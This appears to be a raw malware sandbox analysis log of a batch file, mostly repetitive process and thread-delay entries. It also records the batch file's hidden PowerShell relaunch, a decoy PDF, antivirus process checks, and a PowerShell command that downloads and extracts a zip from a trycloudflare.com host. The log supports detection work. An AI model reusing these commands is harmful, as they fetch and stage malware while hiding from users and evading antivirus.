Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3551	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2560	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 6121	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5913	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3836	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7664
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2104

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7160	Thread sleep count: 3551 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7160	Thread sleep count: 2560 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3800	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1760	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6156	Thread sleep count: 5913 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7040	Thread sleep count: 3836 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6924	Thread sleep time: -23058430092136925s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7088	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3452	Thread sleep count: 7664 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1892	Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3280	Thread sleep count: 2104 > 30

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: 3.8.html.24.dr	Binary or memory string: for better performance. On Windows Subsystem for Linux and QEMU User
Source: cmd.exe, 00000005.00000003.1533893549.0000023995B03000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}&;A
Source: cmd.exe, 00000005.00000003.1533893549.0000023995B03000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
Source: powershell.exe, 0000000D.00000002.1823587187.00000242BC96F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\user\Desktop\yap.bat\" hidden' -WindowStyle Hidden"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\Desktop\yap.bat" hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\YPSIACHYXW.pdf"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "AvastUI.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "avgui.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://german-tan-exotic-collectibles.trycloudflare.com/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { Expand-Archive -Path 'C:\Users\user\Downloads\downloaded.zip' -DestinationPath 'C:\Users\user\Downloads\Extracted' -Force } catch { exit 1 }"	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "try { [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'https://german-tan-exotic-collectibles.trycloudflare.com/bab.zip' -outfile 'c:\users\user\downloads\downloaded.zip' } catch { exit 1 }"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "try { [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'https://german-tan-exotic-collectibles.trycloudflare.com/bab.zip' -outfile 'c:\users\user\downloads\downloaded.zip' } catch { exit 1 }"			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
